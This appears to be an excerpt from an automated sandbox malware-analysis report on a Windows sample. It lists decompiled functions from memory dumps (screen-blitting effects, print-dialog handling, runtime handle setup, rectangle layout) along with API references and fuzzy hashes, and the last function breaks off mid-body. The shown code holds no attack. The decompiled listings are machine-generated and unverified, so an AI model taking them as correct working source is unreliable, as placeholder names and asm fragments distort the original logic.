Part of subcall function 0041FF70: DispatchMessageA.USER32 ref: 0041FFAE
Part of subcall function 0041FF70: SetRectEmpty.USER32(?), ref: 0041FFD7
Part of subcall function 0041FF70: GetDesktopWindow.USER32 ref: 0041FFEF
Part of subcall function 0041FF70: LockWindowUpdate.USER32(?,00000000,?,00000000,0000000F,0000000F,00000000), ref: 00420000
Part of subcall function 0041FF70: GetDCEx.USER32(?,00000000,00000003,?,00000000,0000000F,0000000F,00000000), ref: 00420017

Part of subcall function 0041A275: GetModuleHandleA.KERNEL32(GDI32.DLL,?,0041F6BC), ref: 0041A27D
Part of subcall function 0041A275: GetProcAddress.KERNEL32(00000000,GetLayout), ref: 0041A289

GetWindowRect.USER32 ref: 0041F6DF

Part of subcall function 0041A2AB: GetModuleHandleA.KERNEL32(GDI32.DLL,?,?,0041F6C9,00000000), ref: 0041A2B4
Part of subcall function 0041A2AB: GetProcAddress.KERNEL32(00000000,SetLayout), ref: 0041A2C2

GetWindowRect.USER32 ref: 0041F7CC

Part of subcall function 0041F5D0: OffsetRect.USER32(?,?,?), ref: 0041F607

Part of subcall function 0041F9E4: OffsetRect.USER32(?,?,?), ref: 0041FA0D
Part of subcall function 0041F9E4: OffsetRect.USER32(?,?,?), ref: 0041FA17
Part of subcall function 0041F9E4: OffsetRect.USER32(?,?,?), ref: 0041FA21
Part of subcall function 0041F9E4: OffsetRect.USER32(?,?,?), ref: 0041FA2B

Part of subcall function 00420341: GetCapture.USER32 ref: 00420352
Part of subcall function 00420341: SetCapture.USER32(?), ref: 00420362
Part of subcall function 00420341: GetCapture.USER32 ref: 0042036E
Part of subcall function 00420341: GetMessageA.USER32 ref: 00420388
Part of subcall function 00420341: DispatchMessageA.USER32 ref: 004203BA
Part of subcall function 00420341: GetCapture.USER32 ref: 00420418

GetWindowRect.USER32 ref: 0041F879
InflateRect.USER32(?,00000002,00000002), ref: 0041F97C
InflateRect.USER32(?,00000002,00000002), ref: 0041F98F

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Rect$MessageOffsetWindow$Capture$AddressDispatchHandleInflateModuleProc$DesktopEmptyLockPeekUpdate
String ID:
API String ID: 2041477333-0
Opcode ID: a6936e3c0a7907dd6ed1964909c9b8db90eacfd9e582db4c5833aae79c6c69c9
Instruction ID: 42ddb03621f51a7623203be26b69d0316b25f3a5275469d587ef5c4032a932e9
Opcode Fuzzy Hash: a6936e3c0a7907dd6ed1964909c9b8db90eacfd9e582db4c5833aae79c6c69c9
Instruction Fuzzy Hash: 55D13671A006199FCF04CF98C880ADEBBB6EF49310F1581AAED05BB255D7B1AA45CF94

Uniqueness

Uniqueness Score: -1.00%

Function 004041B5, Relevance: 7.7, APIs: 5, Instructions: 237
windowCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E004041B5(struct HDC__* _a4, int _a8, int _a12, struct HDC__* _a16, int _a20, int _a24, signed int _a28, int _a32, signed int _a36, signed int _a40) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _t131;
				signed int _t230;
				void* _t267;

				if(_a40 < 4) {
					_a40 = 4;
				}
				asm("cdq");
				_v8 = _a28 / _a40 + 1;
				_t131 = _a32;
				asm("cdq");
				_t230 = _t131 % _a40;
				_v12 = _t131 / _a40 + 1;
				_v16 = 0;
				while(1) {
					asm("cdq");
					if(_v16 >= _v12 - _t230 >> 1) {
						break;
					}
					_v20 = 0;
					while(_v20 < _v8 - _v16) {
						BitBlt(_a16, _a20 + _v20 * _a40, _a24 + _v16 * _a40, _a40, _a40, _a4, _a8 + _v20 * _a40, _a12 + _v16 * _a40, 0xcc0020);
						_t230 = _a36;
						E0040381D(_t230);
						_t267 = _t267 + 4;
						_v20 = _v20 + 1;
					}
					_v20 = 0;
					while(_v20 < _v12 - _v16) {
						BitBlt(_a16, _a20 + _a28 - (_v16 + 1) * _a40, _a24 + _v20 * _a40, _a40, _a40, _a4, _a8 + _a28 - (_v16 + 1) * _a40, _a12 + _v20 * _a40, 0xcc0020);
						_t230 = _a36;
						E0040381D(_t230);
						_t267 = _t267 + 4;
						_v20 = _v20 + 1;
					}
					_v20 = _v8 - _v16;
					while(_v20 >= 0) {
						BitBlt(_a16, _a20 + (_v20 - 1) * _a40, _a24 + _a32 - (_v16 + 1) * _a40, _a40, _a40, _a4, _a8 + (_v20 - 1) * _a40, _a12 + _a32 - (_v16 + 1) * _a40, 0xcc0020);
						_t230 = _a36;
						E0040381D(_t230);
						_t267 = _t267 + 4;
						_v20 = _v20 - 1;
					}
					_v20 = _v12 - _v16;
					while(_v20 >= 0) {
						BitBlt(_a16, _a20 + _v16 * _a40, _a24 + (_v20 - 1) * _a40, _a40, _a40, _a4, _a8 + _v16 * _a40, _a12 + (_v20 - 1) * _a40, 0xcc0020);
						_t230 = _a36;
						E0040381D(_t230);
						_t267 = _t267 + 4;
						_v20 = _v20 - 1;
					}
					_v16 = _v16 + 1;
				}
				BitBlt(_a16, _a20, _a24, _a28, _a32, _a4, _a8, _a12, 0xcc0020);
				return 1;
			}

0x004041bf
0x004041c1
0x004041c1
0x004041cb
0x004041d2
0x004041d5
0x004041d8
0x004041d9
0x004041df
0x004041e2
0x004041e9
0x004041ec
0x004041f4
0x00000000
0x00000000
0x004041fa
0x0040420c
0x00404260
0x00404266
0x0040426a
0x0040426f
0x00404209
0x00404209
0x00404274
0x00404286
0x004042e6
0x004042ec
0x004042f0
0x004042f5
0x00404283
0x00404283
0x00404300
0x0040430e
0x0040436f
0x00404375
0x00404379
0x0040437e
0x0040430b
0x0040430b
0x00404389
0x00404397
0x004043ec
0x004043f2
0x004043f6
0x004043fb
0x00404394
0x00404394
0x00404406
0x00404406
0x00404433
0x0040443e

APIs

BitBlt.GDI32(?,?,?,00000004,00000004,?,00000000,00000000,00CC0020), ref: 00404260
BitBlt.GDI32(?,?,?,00000004,00000004,?,?,00000000,00CC0020), ref: 004042E6
BitBlt.GDI32(?,?,?,00000004,00000004,?,00000000,?,00CC0020), ref: 0040436F
BitBlt.GDI32(?,?,?,00000004,00000004,?,00000000,00000000,00CC0020), ref: 004043EC
BitBlt.GDI32(?,?,?,?,?,?,00000000,?,00CC0020), ref: 00404433

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4852f428c49f7dbf2d34c0264fcda9c88eb02544480e12d11db3c71bda218985
Instruction ID: 29e2845c1fd78097f43836e8b5be001507bced236b49523afccdde5b5024b9e6
Opcode Fuzzy Hash: 4852f428c49f7dbf2d34c0264fcda9c88eb02544480e12d11db3c71bda218985
Instruction Fuzzy Hash: 1EA197B1A001099FCB08CFACC995AEEB7B9FF88308F158659F919A7244D734E915CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0042669F, Relevance: 7.7, APIs: 5, Instructions: 152
stringCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E0042669F(void* __ecx) {
				intOrPtr _t67;
				void* _t69;
				void* _t72;
				CHAR** _t77;
				intOrPtr _t90;
				signed int _t112;
				void* _t117;
				void* _t129;
				intOrPtr* _t132;
				signed short* _t134;
				intOrPtr* _t135;
				intOrPtr* _t136;
				void* _t137;

				E00406520(E00429D12, _t137);
				_t129 = __ecx;
				if( *((intOrPtr*)(_t137 + 8)) != 0) {
					L20:
					_push(0);
					_push(0x14000c);
					_push(1);
					E0041009E(_t137 - 0x160);
					 *(_t137 - 4) = 2;
					E0041030E(_t137 - 0x160);
					_t65 =  *((intOrPtr*)(_t129 + 0x94));
					if( *((intOrPtr*)(_t129 + 0x94)) != 0) {
						E0041A92B(_t65);
					}
					_t66 =  *((intOrPtr*)(_t129 + 0x98));
					_t132 = _t129 + 0x98;
					if( *((intOrPtr*)(_t129 + 0x98)) != 0) {
						E0041A92B(_t66);
					}
					_t67 =  *((intOrPtr*)(_t137 - 0x104));
					 *(_t137 - 4) =  *(_t137 - 4) | 0xffffffff;
					 *((intOrPtr*)(_t129 + 0x94)) =  *((intOrPtr*)(_t67 + 8));
					 *_t132 =  *((intOrPtr*)(_t67 + 0xc));
					_t117 = _t137 - 0x160;
					L25:
					_t69 = E00411D13(_t117);
					L26:
					 *[fs:0x0] =  *((intOrPtr*)(_t137 - 0xc));
					return _t69;
				}
				_t72 =  *(__ecx + 0x98);
				if(_t72 == 0) {
					goto L20;
				}
				_t69 = GlobalLock(_t72);
				_t134 = _t69;
				if((_t134[3] & 0x00000001) == 0) {
					goto L26;
				}
				_push(0);
				_push(0x14000c);
				_push(1);
				E0041009E(_t137 - 0xbc);
				 *(_t137 - 4) = 0;
				E0041030E(_t137 - 0xbc);
				if( *((intOrPtr*)( *((intOrPtr*)(_t137 - 0x60)) + 0xc)) != 0) {
					_t77 = E00410255(_t137 - 0xbc, _t137 - 0x10);
					 *(_t137 - 4) = 1;
					if(lstrcmpA(_t134 + ( *_t134 & 0x0000ffff),  *_t77) != 0) {
						L10:
						_t112 = 1;
						L11:
						 *(_t137 - 4) =  *(_t137 - 4) & 0x00000000;
						E00416AEC(_t137 - 0x10);
						if(_t112 == 0) {
							_t83 =  *((intOrPtr*)( *((intOrPtr*)(_t137 - 0x60)) + 8));
							if( *((intOrPtr*)( *((intOrPtr*)(_t137 - 0x60)) + 8)) != 0) {
								E0041A92B(_t83);
							}
							_t85 =  *((intOrPtr*)( *((intOrPtr*)(_t137 - 0x60)) + 0xc));
							if( *((intOrPtr*)( *((intOrPtr*)(_t137 - 0x60)) + 0xc)) != 0) {
								E0041A92B(_t85);
							}
						} else {
							_t88 =  *((intOrPtr*)(_t129 + 0x94));
							_t135 = _t129 + 0x94;
							if( *((intOrPtr*)(_t129 + 0x94)) != 0) {
								E0041A92B(_t88);
							}
							E0041A92B( *((intOrPtr*)(_t129 + 0x98)));
							_t90 =  *((intOrPtr*)(_t137 - 0x60));
							 *_t135 =  *((intOrPtr*)(_t90 + 8));
							 *((intOrPtr*)(_t129 + 0x98)) =  *((intOrPtr*)(_t90 + 0xc));
						}
						L19:
						 *(_t137 - 4) =  *(_t137 - 4) | 0xffffffff;
						_t117 = _t137 - 0xbc;
						goto L25;
					}
					 *((char*)(_t137 + 0xb)) = lstrcmpA(_t134 + (_t134[1] & 0x0000ffff),  *(E00410292(_t137 - 0xbc, _t137 - 0x14))) != 0;
					E00416AEC(_t137 - 0x14);
					if( *((char*)(_t137 + 0xb)) != 0) {
						goto L10;
					}
					_t112 = lstrcmpA & 0xffffff00 | lstrcmpA(_t134 + (_t134[2] & 0x0000ffff),  *(E004102D0(_t137 - 0xbc, _t137 - 0x18))) != 0x00000000;
					E00416AEC(_t137 - 0x18);
					if(_t112 == 0) {
						goto L11;
					}
					goto L10;
				}
				_t105 =  *((intOrPtr*)(_t129 + 0x94));
				_t136 = _t129 + 0x94;
				if( *((intOrPtr*)(_t129 + 0x94)) != 0) {
					E0041A92B(_t105);
				}
				E0041A92B( *((intOrPtr*)(_t129 + 0x98)));
				 *_t136 = 0;
				 *((intOrPtr*)(_t129 + 0x98)) = 0;
				goto L19;
			}

0x004266a4
0x004266b7
0x004266b9
0x00426829
0x00426829
0x0042682a
0x0042682f
0x00426837
0x00426842
0x00426849
0x0042684e
0x00426856
0x00426859
0x00426859
0x0042685e
0x00426864
0x0042686c
0x0042686f
0x0042686f
0x00426874
0x0042687a
0x00426881
0x0042688a
0x0042688c
0x00426892
0x00426892
0x00426897
0x0042689d
0x004268a5
0x004268a5
0x004266bf
0x004266c7
0x00000000
0x00000000
0x004266ce
0x004266d4
0x004266da
0x00000000
0x00000000
0x004266e0
0x004266e1
0x004266e6
0x004266ee
0x004266f9
0x004266fc
0x00426707
0x00426741
0x00426753
0x0042675c
0x004267b7
0x004267b7
0x004267b9
0x004267b9
0x004267c0
0x004267c7
0x00426800
0x00426805
0x00426808
0x00426808
0x00426810
0x00426815
0x00426818
0x00426818
0x004267c9
0x004267c9
0x004267cf
0x004267d7
0x004267da
0x004267da
0x004267e5
0x004267ea
0x004267f0
0x004267f5
0x004267f5
0x0042681d
0x0042681d
0x00426821
0x00000000
0x00426821
0x0042677d
0x00426781
0x0042678a
0x00000000
0x00000000
0x004267ab
0x004267ae
0x004267b5
0x00000000
0x00000000
0x00000000
0x004267b5
0x00426709
0x0042670f
0x00426717
0x0042671a
0x0042671a
0x00426725
0x0042672a
0x0042672c
0x00000000

APIs

__EH_prolog.LIBCMT ref: 004266A4
lstrcmpA.KERNEL32(00000000,00000000,?,00000001,0014000C,00000000), ref: 00426758
lstrcmpA.KERNEL32(?,00000000,?), ref: 00426776
lstrcmpA.KERNEL32(?,00000000,?,?), ref: 004267A4

Part of subcall function 0041A92B: GlobalFlags.KERNEL32(?), ref: 0041A935
Part of subcall function 0041A92B: GlobalUnlock.KERNEL32(?,?,?,0042421F,?,?,?,?,0040199F,00437BE8,?,004013A2), ref: 0041A94C
Part of subcall function 0041A92B: GlobalFree.KERNEL32 ref: 0041A957

GlobalLock.KERNEL32 ref: 004266CE

Part of subcall function 0041009E: __EH_prolog.LIBCMT ref: 004100A3

Part of subcall function 0041030E: PrintDlgA.COMDLG32(?,0042684E,00000001,0014000C,00000000,?,?,00000000), ref: 00410318

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Global$lstrcmp$H_prolog$FlagsFreeLockPrintUnlock
String ID:
API String ID: 2564375162-0
Opcode ID: 653e2c81b0d72e161c244adbd25edb8e30c70488008d71227ddbd14f21ca4b2e
Instruction ID: dab6b3ac01e2e209cde5cdaaba7fbabb505c74ae40abd7d4cd101a1c9b428fb9
Opcode Fuzzy Hash: 653e2c81b0d72e161c244adbd25edb8e30c70488008d71227ddbd14f21ca4b2e
Instruction Fuzzy Hash: E851A070B002269BCB14EF75D885FDAB7B8BF01308F41446EE559A3292DB38ED94CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0040963B, Relevance: 7.6, APIs: 5, Instructions: 150
COMMON

Download Yara Rule

C-Code - Quality: 99%

			E0040963B() {
				void** _v8;
				struct _STARTUPINFOA _v76;
				signed int* _t48;
				signed int _t50;
				long _t55;
				signed int _t57;
				signed int _t58;
				int _t59;
				signed char _t63;
				signed int _t65;
				void** _t67;
				int _t68;
				int _t69;
				signed int* _t70;
				int _t72;
				intOrPtr* _t73;
				signed int* _t75;
				void* _t76;
				void* _t84;
				void* _t87;
				int _t88;
				signed int* _t89;
				void** _t90;
				signed int _t91;
				int* _t92;

				_t89 = E00405667(0x480);
				if(_t89 == 0) {
					E00406490(0x1b);
				}
				 *0x43b520 = _t89;
				 *0x43b620 = 0x20;
				_t1 =  &(_t89[0x120]); // 0x480
				_t48 = _t1;
				while(_t89 < _t48) {
					_t89[1] = _t89[1] & 0x00000000;
					 *_t89 =  *_t89 | 0xffffffff;
					_t89[2] = _t89[2] & 0x00000000;
					_t89[1] = 0xa;
					_t70 =  *0x43b520; // 0x22948c0
					_t89 =  &(_t89[9]);
					_t48 =  &(_t70[0x120]);
				}
				GetStartupInfoA( &_v76);
				__eflags = _v76.cbReserved2;
				if(_v76.cbReserved2 == 0) {
					L25:
					_t72 = 0;
					__eflags = 0;
					do {
						_t75 =  *0x43b520; // 0x22948c0
						_t50 = _t72 + _t72 * 8;
						__eflags = _t75[_t50] - 0xffffffff;
						_t90 =  &(_t75[_t50]);
						if(_t75[_t50] != 0xffffffff) {
							_t45 =  &(_t90[1]);
							 *_t45 = _t90[1] | 0x00000080;
							__eflags =  *_t45;
							goto L37;
						}
						__eflags = _t72;
						_t90[1] = 0x81;
						if(_t72 != 0) {
							asm("sbb eax, eax");
							_t55 =  ~(_t72 - 1) + 0xfffffff5;
							__eflags = _t55;
						} else {
							_t55 = 0xfffffff6;
						}
						_t87 = GetStdHandle(_t55);
						__eflags = _t87 - 0xffffffff;
						if(_t87 == 0xffffffff) {
							L33:
							_t90[1] = _t90[1] | 0x00000040;
						} else {
							_t57 = GetFileType(_t87);
							__eflags = _t57;
							if(_t57 == 0) {
								goto L33;
							}
							_t58 = _t57 & 0x000000ff;
							 *_t90 = _t87;
							__eflags = _t58 - 2;
							if(_t58 != 2) {
								__eflags = _t58 - 3;
								if(_t58 == 3) {
									_t90[1] = _t90[1] | 0x00000008;
								}
								goto L37;
							}
							goto L33;
						}
						L37:
						_t72 = _t72 + 1;
						__eflags = _t72 - 3;
					} while (_t72 < 3);
					return SetHandleCount( *0x43b620);
				}
				_t59 = _v76.lpReserved2;
				__eflags = _t59;
				if(_t59 == 0) {
					goto L25;
				}
				_t88 =  *_t59;
				_t73 = _t59 + 4;
				_v8 = _t73 + _t88;
				__eflags = _t88 - 0x800;
				if(_t88 >= 0x800) {
					_t88 = 0x800;
				}
				__eflags =  *0x43b620 - _t88; // 0x20
				if(__eflags >= 0) {
					L18:
					_t91 = 0;
					__eflags = _t88;
					if(_t88 <= 0) {
						goto L25;
					} else {
						goto L19;
					}
					do {
						L19:
						_t76 =  *_v8;
						__eflags = _t76 - 0xffffffff;
						if(_t76 == 0xffffffff) {
							goto L24;
						}
						_t63 =  *_t73;
						__eflags = _t63 & 0x00000001;
						if((_t63 & 0x00000001) == 0) {
							goto L24;
						}
						__eflags = _t63 & 0x00000008;
						if((_t63 & 0x00000008) != 0) {
							L23:
							_t65 = _t91 & 0x0000001f;
							__eflags = _t65;
							_t67 =  &(0x43b520[_t91 >> 5][_t65 + _t65 * 8]);
							 *_t67 =  *_v8;
							_t67[1] =  *_t73;
							goto L24;
						}
						_t68 = GetFileType(_t76);
						__eflags = _t68;
						if(_t68 == 0) {
							goto L24;
						}
						goto L23;
						L24:
						_v8 =  &(_v8[1]);
						_t91 = _t91 + 1;
						_t73 = _t73 + 1;
						__eflags = _t91 - _t88;
					} while (_t91 < _t88);
					goto L25;
				} else {
					_t92 = 0x43b524;
					while(1) {
						_t69 = E00405667(0x480);
						__eflags = _t69;
						if(_t69 == 0) {
							break;
						}
						 *0x43b620 =  *0x43b620 + 0x20;
						__eflags =  *0x43b620;
						 *_t92 = _t69;
						_t13 = _t69 + 0x480; // 0x480
						_t84 = _t13;
						while(1) {
							__eflags = _t69 - _t84;
							if(_t69 >= _t84) {
								break;
							}
							 *(_t69 + 4) =  *(_t69 + 4) & 0x00000000;
							 *_t69 =  *_t69 | 0xffffffff;
							 *(_t69 + 8) =  *(_t69 + 8) & 0x00000000;
							 *((char*)(_t69 + 5)) = 0xa;
							_t69 = _t69 + 0x24;
							_t84 =  *_t92 + 0x480;
						}
						_t92 =  &(_t92[1]);
						__eflags =  *0x43b620 - _t88; // 0x20
						if(__eflags < 0) {
							continue;
						}
						goto L18;
					}
					_t88 =  *0x43b620; // 0x20
					goto L18;
				}
			}

0x0040964e
0x00409653
0x00409657
0x0040965c
0x0040965d
0x00409663
0x0040966d
0x0040966d
0x00409673
0x00409677
0x0040967b
0x0040967e
0x00409682
0x00409686
0x0040968b
0x0040968e
0x0040968e
0x00409699
0x0040969f
0x004096a4
0x0040977b
0x0040977b
0x0040977b
0x0040977d
0x0040977d
0x00409783
0x00409786
0x0040978a
0x0040978d
0x004097dc
0x004097dc
0x004097dc
0x00000000
0x004097dc
0x0040978f
0x00409791
0x00409795
0x004097a1
0x004097a3
0x004097a3
0x00409797
0x00409799
0x00409799
0x004097ad
0x004097af
0x004097b2
0x004097cb
0x004097cb
0x004097b4
0x004097b5
0x004097bb
0x004097bd
0x00000000
0x00000000
0x004097bf
0x004097c4
0x004097c6
0x004097c9
0x004097d1
0x004097d4
0x004097d6
0x004097d6
0x00000000
0x004097d4
0x00000000
0x004097c9
0x004097e0
0x004097e0
0x004097e1
0x004097e1
0x004097f6
0x004097f6
0x004096aa
0x004096ad
0x004096af
0x00000000
0x00000000
0x004096b5
0x004096b7
0x004096bd
0x004096c5
0x004096c7
0x004096c9
0x004096c9
0x004096cb
0x004096d1
0x00409729
0x00409729
0x0040972b
0x0040972d
0x00000000
0x00000000
0x00000000
0x00000000
0x0040972f
0x0040972f
0x00409732
0x00409734
0x00409737
0x00000000
0x00000000
0x00409739
0x0040973b
0x0040973d
0x00000000
0x00000000
0x0040973f
0x00409741
0x0040974e
0x00409755
0x00409755
0x00409762
0x0040976a
0x0040976e
0x00000000
0x0040976e
0x00409744
0x0040974a
0x0040974c
0x00000000
0x00000000
0x00000000
0x00409771
0x00409771
0x00409775
0x00409776
0x00409777
0x00409777
0x00000000
0x004096d3
0x004096d3
0x004096d8
0x004096dd
0x004096e2
0x004096e5
0x00000000
0x00000000
0x004096e7
0x004096e7
0x004096ee
0x004096f0
0x004096f0
0x004096f6
0x004096f6
0x004096f8
0x00000000
0x00000000
0x004096fa
0x004096fe
0x00409701
0x00409705
0x0040970b
0x0040970e
0x0040970e
0x00409716
0x00409719
0x0040971f
0x00000000
0x00000000
0x00000000
0x00409721
0x00409723
0x00000000
0x00409723

APIs

GetStartupInfoA.KERNEL32(?), ref: 00409699
GetFileType.KERNEL32(?,?,00000000), ref: 00409744
GetStdHandle.KERNEL32(-000000F6,?,00000000), ref: 004097A7
GetFileType.KERNEL32(00000000,?,00000000), ref: 004097B5
SetHandleCount.KERNEL32 ref: 004097EC

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: FileHandleType$CountInfoStartup
String ID:
API String ID: 1710529072-0
Opcode ID: ecd1a007bcd950c4f6a802b73a84018a70199882e3a03b2a3ff8f6cc88cac146
Instruction ID: 8f3487591cd982a3eb9725f147ad5950e145dc92a1b9c359c43610153c7b6e5a
Opcode Fuzzy Hash: ecd1a007bcd950c4f6a802b73a84018a70199882e3a03b2a3ff8f6cc88cac146
Instruction Fuzzy Hash: F8510832514605CBD7208F38C884B7677E0EB05368F28467ED596EB3E2D7389C06C759

Uniqueness

Uniqueness Score: -1.00%

Function 0042722C, Relevance: 7.6, APIs: 5, Instructions: 127
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E0042722C(void* __ecx, void* __edx, void* __eflags, signed int _a4) {
				intOrPtr _v8;
				char _v12;
				void* _v20;
				void* __ebp;
				intOrPtr* _t51;
				intOrPtr _t54;
				int _t58;
				signed int _t65;
				int _t77;
				void* _t79;
				signed int _t80;
				signed int _t82;
				signed int _t83;
				int _t84;
				void* _t88;
				int _t91;
				signed int _t100;
				signed int _t104;
				void* _t109;
				struct tagRECT* _t110;

				_t88 = __ecx;
				_t104 = _a4 + _a4 * 4 << 3;
				_t109 = _t104 +  *((intOrPtr*)(__ecx + 0x90));
				_t51 = E004271A8(__ecx, __edx, __eflags,  &_v20);
				_v12 =  *_t51;
				_v8 =  *((intOrPtr*)(_t51 + 4));
				_t91 =  *(_t109 + 0x24);
				_t100 = 0 |  *(_t109 + 0x20) - _t91 < 0x00000000;
				_t54 =  *((intOrPtr*)(__ecx + 0xec));
				if(_t54 == 0) {
					 *(_t109 + 0x18) =  *(_t109 + 0x20);
					 *(_t109 + 0x1c) =  *(_t109 + 0x24);
					L12:
					_v20 = MulDiv( *(_t109 + 0x10),  *(_t109 + 0x18),  *(_t109 + 0x1c));
					_t58 = MulDiv( *(_t109 + 0x14),  *(_t109 + 0x18),  *(_t109 + 0x1c));
					_t110 = _t104 +  *((intOrPtr*)(_t88 + 0x90));
					SetRect(_t110, 8, 8, _v20 + 0xb, _t58 + 0xb);
					if( *((intOrPtr*)(_t88 + 0xec)) != 0) {
						_push(0x42e4b0);
						_t65 = _t110->right - _t110->left + 0x10;
						__eflags = _t65;
						_push( &_v12);
						_push(_t110->bottom - _t110->top + 0x10);
						_push(_t65);
						_push(1);
						return E0041AE9C(_t88, _t65);
					}
					asm("cdq");
					asm("cdq");
					_t77 = OffsetRect(_t110, (_v12 - _t110->right - _t110->left - _t100 >> 1) - 1, (_v8 - _t110->bottom - _t110->top - _t100 >> 1) - 1);
					if(_a4 != 1) {
						return _t77;
					}
					return OffsetRect(_t110,  *(_t88 + 0xfc), 0);
				}
				_t79 = _t54 - 1;
				if(_t79 == 0) {
					__eflags = _t100;
					 *(_t109 + 0x1c) = _t91;
					_t80 =  *(_t109 + 0x20);
					if(_t100 == 0) {
						_t82 = _t80 + _t80 * 2 - _t91;
					} else {
						_t82 = _t80 + _t91;
						__eflags = _t82;
					}
					asm("cdq");
					_t83 = _t82 - _t100;
					__eflags = _t83;
					_t84 = _t83 >> 1;
					L9:
					 *(_t109 + 0x18) = _t84;
					goto L12;
				}
				if(_t79 != 1) {
					goto L12;
				}
				if(_t100 == 0) {
					 *(_t109 + 0x1c) = _t91;
					_t84 = ( *(_t109 + 0x20) << 1) -  *(_t109 + 0x24);
				} else {
					_t84 = 1;
					 *(_t109 + 0x1c) = _t84;
				}
				goto L9;
			}

0x00427238
0x00427243
0x00427246
0x0042724d
0x00427256
0x0042725c
0x0042725f
0x0042726b
0x0042726e
0x00427271
0x004272b2
0x004272b8
0x004272bb
0x004272cd
0x004272d6
0x004272ec
0x004272f4
0x00427301
0x00427350
0x00427358
0x00427358
0x0042735b
0x0042735c
0x0042735d
0x0042735e
0x00000000
0x00427362
0x00427313
0x00427325
0x0042732d
0x00427333
0x0042736b
0x0042736b
0x00000000
0x0042733e
0x00427273
0x00427274
0x00427292
0x00427294
0x00427297
0x0042729a
0x004272ab
0x0042729c
0x0042729c
0x0042729c
0x0042729c
0x0042729e
0x0042729f
0x0042729f
0x004272a1
0x004272a3
0x004272a3
0x00000000
0x004272a3
0x00427277
0x00000000
0x00000000
0x0042727b
0x00427285
0x0042728d
0x0042727d
0x0042727f
0x00427280
0x00427280
0x00000000

APIs

MulDiv.KERNEL32(?,?,?), ref: 004272C4
MulDiv.KERNEL32(?,?,?), ref: 004272D6
SetRect.USER32 ref: 004272F4
OffsetRect.USER32(?,?,?), ref: 0042732D
OffsetRect.USER32(?,?,00000000), ref: 0042733E

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Rect$Offset
String ID:
API String ID: 3858320380-0
Opcode ID: a8bcfc7a24c1dd58891d067b0bfb63c54d62dd3b19c554575f39b6ca731ca03a
Instruction ID: 9d4db4d92ebfce67b92012e8cfbb6e150ce2038beb84166a71d0e9c619fd8a43
Opcode Fuzzy Hash: a8bcfc7a24c1dd58891d067b0bfb63c54d62dd3b19c554575f39b6ca731ca03a
Instruction Fuzzy Hash: 15418871600A15DFD720CF68D944AAABBF6FB88300F484A2DE886D7655D734F805CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 0041AE9C, Relevance: 7.6, APIs: 5, Instructions: 118
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E0041AE9C(void* __ecx, void* __eflags) {
				struct tagPOINT* _t76;
				long* _t78;
				long* _t81;
				struct tagPOINT* _t82;
				signed int _t84;
				signed int _t85;
				signed int _t86;
				int _t87;
				struct tagPOINT* _t97;
				signed int _t108;
				void* _t123;
				void* _t125;

				E00406520(E0042A85C, _t125);
				_t123 = __ecx;
				_push(0);
				 *(_t125 - 0x10) =  *(__ecx + 0x40);
				 *(__ecx + 0x40) =  *(_t125 + 8);
